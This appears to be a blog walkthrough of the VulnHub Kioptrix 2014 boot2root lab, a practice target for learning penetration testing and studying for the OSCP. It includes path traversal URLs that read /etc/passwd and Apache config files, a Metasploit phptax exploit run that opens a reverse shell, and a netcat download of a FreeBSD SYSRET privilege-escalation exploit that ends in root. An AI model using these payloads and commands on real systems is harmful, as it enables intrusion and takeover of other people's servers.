Vulnhub – Kioptrix: 2014 (#5)

Part 5 of 5 of the kioptrix series! This a boot2root or for those that are not familiar with that term, the point of the game is to get root shell. The kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to VMs in the PWK course for those who want to get the OSCP certification. Link to downloading the Vm can be found here. Now lets get started!

Description from author:

Note from VulnHub

100% works with VMware player6, workstation 10 & fusion 6.

May have issues with ViritualBox If this is the case, try this ‘fix’: http://download.vulnhub.com/kioptrix/kiop2014_fix.zip – Step by Step screenshots for Virtualbox 4.3 & VMware Workstation 9)
About the VM

As usual, this vulnerable machine is targeted at the beginner. It’s not meant for the seasoned pentester or security geek that’s been at this sort of stuff for 10 years. Everyone needs a place to start and all I want to do is help in that regard.

Also, before powering on the VM I suggest you remove the network card and re-add it. For some oddball reason it doesn’t get its IP (well I do kinda know why but don’t want to give any details away). So just add the VM to your virtualization software, remove and then add a network card. Set it to bridge mode and you should be good to go.

This was created using ESX 5.0 and tested on Fusion, but shouldn’t be much of a problem on other platforms.

Kioptrix VM 2014 download 825Megs

MD5 (kiop2014.tar.bz2) = 1f802308f7f9f52a7a0d973fbda22c0a

SHA1 (kiop2014.tar.bz2) = 116eb311b91b28731855575a9157043666230432

Waist line 32″

p.s.: Don’t forget to read my disclaimer…

Works out of the box with VMware workstation 10, player 6, fusion 6 (Can edit the vmx file to force a downgrade for an older version – see ‘kiop2014_fix.zip’). Has been known to work with Virtualbox 4.3 or higher… First thing: try setting it to a x64 machine. Then check: http://download.vulnhub.com/kioptrix/kiop2014_fix.zip.

The Attack

Kali Linux machine

 192.168.182.147 

Scanning and Reconnaissance

Using the tool netdiscover, I found the victim VM to be 192.168.182.155

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

Have the IP of the victim. Now time to run nmap.

root@kali:~# nmap -sS -A -T4 192.168.182.155

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-03-19 20:08 CDT
Nmap scan report for 192.168.182.155
Host is up (0.00043s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE    VERSION
22/tcp   closed ssh
80/tcp   open   tcpwrapped
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Site doesn't have a title (text/html).
8080/tcp open   tcpwrapped
|_http-server-header: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
MAC Address: 00:0C:29:4A:09:D7 (VMware)
Device type: general purpose
Running: FreeBSD 7.X|8.X|9.X
OS CPE: cpe:/o:freebsd:freebsd:7 cpe:/o:freebsd:freebsd:8 cpe:/o:freebsd:freebsd:9
OS details: FreeBSD 7.0-RELEASE - 9.0-RELEASE
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.43 ms 192.168.182.155

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.71 seconds
root@kali:~#

Found that the victim has ports 80 and port 8080 open with Apache/2.2.21 running on the victim. Also as well it looks that the victim is running FreeBSD. Lets see what’s on the victim’s website.



When browsing the site, all it showed was It works! When checking the page source however, I was to find that the server is running a web app called pChart2.1.3. Looks like it has multiple vulnerabilities listed on the exploit database located here. One which we are going to do is the directory traversal. More info on the directory traversal from the OWASP site can be located here —> Path Traversal and
Testing Directory traversal.


Also, what I found interesting was when I browsed the server but on port 8080, it said I was forbidden. Maybe this info might useful later on. Well for now we have enough info, lets exploit this VM.

Exploitation

We will be exploiting pChart 2.1.3 web app trying directory traversal. Inputting the URL below I will see if I can get the victim to display the /etc/passwd file. This will check if the victim is vulnerable to a directory traversal attack . If it is then I should get the info the the /etc/passwd file. Note: All I did was add ?Action=View&Script=%2f..%2f..%2fetc/passwd to the URL(after index.php). Looking at the info in the exploit database(exploit 31173) helps as well.

http://192.168.182.155/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

Looks like it is vulnerable and we got our file. There is a mysql user and an ossec user. Looks like the victim has a host intrusion detection system. Just some interesting info but lets move on to our exploitation. We need to find a way to in.

Lets see what we know. The victim is running FreeBSd and is running Apache/2.2.21 . Lets check the config files for the apache server and see what we get. Since this a FreeBSd operating system the config files for apache will be located in /usr/local/etc/apache22/httpd.conf.

Note: Just fyi for those of you wondering how I knew where exactly the apache config files were located. I didn’t. I did some online research and found a page where is showed how to set up Apache on FreeBSd, located here. This helped me find the location of the Apache config files.

The URL below is used to access the Apache config files. Lets see what we find.

http://192.168.182.155/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

There is abundance of information on this config file but if you keep looking to the bottom of the file, it shows some very valuable data.

Well look at this! The only way to access the web server on port 8080 is to set our user agent to Mozilla/4.0 . Lets try to access port 8080 by changing the agent. I used this guide to help me out called Changing User Agent in Firefox: A Step by Step Guide as well as this post HOWTO: Change User Agent in Firefox/Iceweasel. These guides helped a lot but I’ll show you all how I did it. I opened up Iceweasel and put about:config in the URL.

Next, it prompts us with warning but don’t worry, I know what I’m doing. Click on I’ll be careful, I promise!. Once in, Right-Click and go to New and then String . Enter the preference name general.useragent.override

It will then ask to enter a string value. Make sure to put Mozilla/4.0

When all is done it should look like the picture below.

Now lets access the server on port 8080 and see what it gives us.

Looks like there is a link called phptax. Lets check it out.

Looks like phptax is some sort of tax program and it’s vulnerable – phptax 0.8 – Remote Code Execution
. I also used searchsploit which also said phptax was vulnerable to a remote code execution attack.

root@kali:~# searchsploit phptax
------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                             |  Path
                                                                                           | (/usr/share/exploitdb/platforms)
------------------------------------------------------------------------------------------- ----------------------------------
PhpTax pfilez Parameter Exec Remote Code Injection                                         | ./php/webapps/21833.rb
phptax 0.8 - Remote Code Execution Vulnerability                                           | ./php/webapps/21665.txt
PhpTax 0.8 - File Manipulation(newvalue_field) Remote Code Execution                       | ./php/webapps/25849.txt
------------------------------------------------------------------------------------------- ----------------------------------
root@kali:~# 

Metasploit even has a module for it. Lets fire up metasploit for this attack.

root@kali:~# msfconsole

 ______________________________________________________________________________
|                                                                              |
|                          3Kom SuperHack II Logon                             |
|______________________________________________________________________________|
|                                                                              |
|                                                                              |
|                                                                              |
|                 User Name:          [   security    ]                        |
|                                                                              |
|                 Password:           [               ]                        |
|                                                                              |
|                                                                              |
|                                                                              |
|                                   [ OK ]                                     |
|______________________________________________________________________________|
|                                                                              |
|                                                        http://metasploit.pro |
|______________________________________________________________________________|


Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro
Learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.5-2016010401                   ]
+ -- --=[ 1517 exploits - 875 auxiliary - 257 post        ]
+ -- --=[ 437 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/multi/http/phptax_exec 
msf exploit(phptax_exec) > show options

Module options (exploit/multi/http/phptax_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /phptax/         yes       The path to the web application
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   PhpTax 0.8


msf exploit(phptax_exec) > set RHOST 192.168.182.155
RHOST => 192.168.182.155
msf exploit(phptax_exec) > set RPORT 8080
RPORT => 8080
msf exploit(phptax_exec) > run

[*] Started reverse TCP double handler on 192.168.182.147:4444 
[*] 192.168.182.1558080 - Sending request...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo hVJmaYj76Ho5pii6;
[*] Writing to socket A
[*] Writing to socket B
[*] Command: echo 3T5yTlLQuaYzN6SB;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from sockets...
[*] Reading from socket B
[*] Reading from socket B
[*] B: "hVJmaYj76Ho5pii6\r\n"
[*] B: "3T5yTlLQuaYzN6SB\r\n"
[*] Matching...
[*] Matching...
[*] A is input...
[*] A is input...
[*] Command shell session 1 opened (192.168.182.147:4444 -> 192.168.182.155:26762) at 2017-03-20 00:00:40 -0500
[*] Command shell session 2 opened (192.168.182.147:4444 -> 192.168.182.155:58151) at 2017-03-20 00:00:40 -0500

id
uid=80(www) gid=80(www) groups=80(www)

Once in I spawned a tty shell using the command below. Then ran uname -a command to see what the victim was running.

/bin/sh -i
sh: can't access tty; job control turned off
$ uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
$ 

The victim is currently running FreeBSD 9.0 which is vulnerable to Intel SYSRET Kernel Privilege Escalation.

Next I will download the exploit(on kali) and transfer the file using netcat. The code below sets up the listener

root@kali:~/Downloads# nc -lvp 1234 < exploit.c
listening on [any] 1234 ...

Changed directory to tmp and then connected to the attack machine and got the exploit.

$cd /tmp
$ nc -nv 192.168.182.147 1234 > exploit.c
Connection to 192.168.182.147 1234 port [tcp/*] succeeded!

Compiled and ran the exploit

gcc -o exploit expoit.c
chmod a+x exploit

Ran the exploit

./exploit
[+] SYSRET FUCKUP!!
[+] Start Engine...
[+] Crotz...
[+] Crotz...
[+] Crotz...
[+] Woohoo!!!

id
uid=0(root) gid=0(wheel) groups=0(wheel)

Conclusion

Well this one took much more time then anticipated and was harder for me than it should've been but what you have to do is tough it out and "TRY HARDER"! That's it for the kioptrix series. I will work on more VMs on vulnhub in the future and might work on some write ups on the previous season of the National Cyber League since it's coming up in April. We'll see. If you guys have any ideas or enjoyed the read then leave a comment. Thanks for the read. Till next time!

1 comment

Leave a Reply

Your email address will not be published. Required fields are marked *